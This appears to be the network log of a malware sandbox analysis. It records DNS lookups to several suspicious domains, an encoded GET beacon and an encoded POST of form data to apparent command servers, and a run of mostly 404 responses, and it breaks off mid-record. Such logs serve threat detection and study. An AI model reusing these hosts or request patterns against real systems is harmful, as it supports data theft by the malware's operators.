Source: global traffic | HTTP traffic detected: GET /utww/?YFCLW=BxgTctSh&CviT=tlTwcU9ZWjUkkDOfL8m8hKdUQz2PcyBI6lKxmlk4uDhIu7zh7TbGiDYhoS5CKbA93kURRma0w2BXBhIfz9bvypQbFpT5jG8x4isXk855maVsJaNYXMtMyHgYaLu1BwVeMhPbSn8= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.mzkd6gp5.top Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
Source: global traffic | DNS traffic detected: DNS query: www.kx22368.shop
Source: global traffic | DNS traffic detected: DNS query: www.laduta.xyz
Source: global traffic | DNS traffic detected: DNS query: www.einpisalpace.shop
Source: global traffic | DNS traffic detected: DNS query: www.ripbgs.info
Source: global traffic | DNS traffic detected: DNS query: www.0303588a47.buzz
Source: global traffic | DNS traffic detected: DNS query: www.tizzles.tech
Source: global traffic | DNS traffic detected: DNS query: www.explorevision.xyz
Source: global traffic | DNS traffic detected: DNS query: www.babyzhibo.net
Source: global traffic | DNS traffic detected: DNS query: www.mzkd6gp5.top
Source: global traffic | DNS traffic detected: DNS query: www.potorooqr.lol
Source: unknown | HTTP traffic detected: POST /d89m/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.laduta.xyz Origin: http://www.laduta.xyz Referer: http://www.laduta.xyz/d89m/ Cache-Control: no-cache Content-Length: 209 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30 Data Ascii: CviT=9MhNgERgfHRCGLpvCai6VpAv3PXcacEz1TVM+LAI1If/clFpeIqwbZZ+86K0vpIpPge1js9FBoly2oQF0juYLbjOryT6ws93CYQv7UvYPQ8VJWlcAIIotl6MYWL6NNnR6B7M+nVUp09UlpHMbXEsqdB1ZRN3bkR3gzn4wYaxXK84ufhZZ7PKpjOb9VIJukmfaD5lu1I2kno4
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:34:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sun, 05 Jan 2025 21:39:02 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KmpM3e1wafTDo8ga%2BUvIiVhequ6JWzaXHwyFkY3Wtg%2Baqy3WG8c5k9kX%2BlCkstptVF8%2FMjmTyhZNDZrripHRhR%2BolcTYrFXfZ1Bh89us%2FW5piyDAF3Fq5TRk8LdtXiZxl7lO8xmkg3Q%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90140cb7bf2b1899-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1559&rtt_var=779&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=787&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c 55 c8 2b 59 aa 38 47 45 68 93 cf 7b 4e 11 3d 61 bc 18 1f 51 ce 66 97 
Data Ascii: 2daTMo8W*ELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC*$Dvul6+y*.K";HIRDo4"eH^od3Z*WoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:34:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sun, 05 Jan 2025 21:39:02 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uEg6bJs24FeUKbn5b7tRjZ7zFMqVEmQN90RQuuBz2mcvn9pYi0iOORnh7jhDvJCS4TU4bT36Awk7kHDeo5S6OU%2BBOVfvJ8xcZeoVzz93Tnhj3D7ypZmxzplCgffOZRpzqTPDo3o8sy4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90140cc79d5b41f3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1687&rtt_var=843&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=811&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c 55 c8 2b 59 aa 38 47 45 68 93 cf 7b 4e 11 3d 61 bc 18 1f 51 ce 66 97 e7 97 d7 09 
d4 dc 96 52 c5 70 Data Ascii: 2daTMo8W*ELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC*$Dvul6+y*.K";HIRDo4"eH^od3Z*WoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQfRp
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:34:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sun, 05 Jan 2025 21:39:02 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r3M1oF1vOrNdQRcOIOkTYK8qG2pt%2Bv5ePrYws651IVelprKnVaXWqEw6TQPWWYFFWnfHnt97r6FyfPi8%2BfWvgDg5Bho8WL3gGGzoVdHsd05XUjk1Tc4wBO7SJrgTDNAc9lTUbC4XKZQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90140cddecff8ce0-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1992&min_rtt=1992&rtt_var=996&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1824&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c 55 c8 2b 59 aa 38 47 45 68 93 cf 7b 4e 11 3d 61 bc 18 1f 51 ce 66 97 e7 97 d7 
09 d4 dc 96 Data Ascii: 2cfTMo8W*ELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC*$Dvul6+y*.K";HIRDo4"eH^od3Z*WoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:35:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sun, 05 Jan 2025 21:39:02 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Snvxd1puUF9o2Mz0OAQuGkTECCtcN46uuYGC4cbROHn8UIIb6iVPMLI8jOph7xzpmEa%2F2JuptClsjS1dEl%2BbjFmDTnRsKUZMy%2FP5VL7y7t8Y2w6nRn1idTfAUdK6Y613lb8sYwznWBI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90140cedebf9421f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=520&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 
73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 Data Ascii: 591<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:35:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:35:40 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:35:43 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:35:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:36:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RC2qw032OEnNs%2BmHTjkFpusK2%2FpAfFZhhfvEXxqZxN7IbuYilUOenkXrwRJbtV9%2BGxaiUjJL0YiOz%2B3kIp35M2FXX4nsqXFLxurg5V2cLZKhVkM6m6hd01ybBlGMM5Q7nQhr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90140e867f2f8ce0-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1767&rtt_var=883&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=772&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:36:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AeNl2hckcJYVSxWr37%2FQLF6aX8xIag%2Fdkg%2FtqmU00yrE%2B0b7KCkQpWd2pY7nrskp12m9%2FlcVpG4L6jAdG93%2B8jr%2FOjl6gfmJynCtKa48Dhei%2FGbAHwD0GsB1WKrDaRPD7%2BNT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90140e96584b1899-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1695&rtt_var=847&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=796&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:36:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0mAv7VSk0SO4%2B5zlY6rnMYxnYfjjvDHA6b%2FXrG4qjNN8I6P0EL6UbW%2Fo%2F9DW0ugn6fAmvBcEDZmiZwDI84%2F5943lLf0HYOvYC51M6eY9GuynBYwUxvDh%2B2I8RFqyvnfUyrw1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90140ea659960fa8-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: 